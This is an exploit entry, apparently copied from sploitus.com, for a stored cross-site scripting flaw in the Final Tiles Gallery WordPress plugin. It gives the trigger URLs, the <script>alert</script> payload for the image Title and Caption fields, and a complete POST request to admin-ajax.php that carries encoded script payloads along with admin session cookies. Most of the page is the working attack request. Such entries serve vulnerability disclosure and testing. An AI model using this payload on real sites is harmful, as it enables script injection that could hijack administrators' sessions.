Share
## https://sploitus.com/exploit?id=WPEX-ID:10241
#XSS TRIGGER POINT: When an admin or authenticated user load contents of gallery or post with Shortcode embed: [FinalTilesGallery id='3']
https://[WP]/wp-admin/admin.php?page=ftg-lite-gallery-admin&id=2
https://[WP]/2020/05/13/site-review/


Add an image to a gallery from the plugin, then put the payload <script>alert(/XSS/)</script> in the Title and Caption fields.

POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/admin.php?page=ftg-lite-gallery-admin&id=2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 368
Origin: http://example.com
Connection: close
Cookie: wordpress_58dc4566418ddfdf24cf6b5640426bf6=admin%7C1590369568%7CvSHzpmLsv6Kmrqs3GIvTptVPrAKjmhvqSX3Y8xwwaoj%7C3ff5dbb79e29018c7866d9c1a371b372f43c22ff140dfd7b1c0fa68bda3d96ad; table_1=off; table_O-Z=on; table_2=off; table_I-Z=on; table_3=off; table_II-Z=on; table_4=off; table_III-Z=on; table_5=off; table_IV-Z=on; table_6=off; table_V-Z=on; table_7=off; table_VI-Z=on; table_8=off; table_VII-Z=on; table_9=off; table_VIII-Z=on; table_10=off; table_IX-Z=on; table_11=off; table_X-Z=on; table_12=off; table_XI-Z=on; wplcfirstsession=1; wfu_storage_QD1qfXa1PwpRDp11=C:Users; nc_sid=-xLya3FYncyYR9V_llTt; ftg_imglist_size=medium; wp-settings-1=libraryContent%3Dbrowse%26urlbutton%3Dnone%26posts_list_mode%3Dexcerpt%26uploader%3D1%26mfold%3Do; wp-settings-time-1=1589361159; wordpress_logged_in_58dc4566418ddfdf24cf6b5640426bf6=admin%7C1590369568%7CvSHzpmLsv6Kmrqs3GIvTptVPrAKjmhvqSX3Y8xwwaoj%7Cf1c7845d2c3b0856cfa559d0f5496afd2f03e7f519a0f26a3ede63fd8971759c; nc_sid=ta7RSzGrI-rVg-9hyzIk; advanced_ads_hide_deactivate_feedback=1; wplc_chat_status=5; _icl_current_language=en; nc_status=browsing; tcx_customerID=rJQlLlHFcU; wplc_cid=Bk4eLeHFcI_1589362760300; PHPSESSID=909kc73hdpc69l5vk6malipke7

source=images&action=save_image&FinalTiles_gallery=3ddb0e3aa2&img_url=http%3A%2F%2Ftarget%2Fwordpress%2Fwp-content%2Fuploads%2F2020%2F05%2Ftiki-5.jpg&imageTitle=%3Cscript%3Ealert(1111)%3C%2Fscript%3E&description=%3Cscript%3Ealert(2222)%3C%2Fscript%3E&alt=alttext&link=&target=&id=2&type=image&img_id=7&sortOrder=2&filters=&post_id=0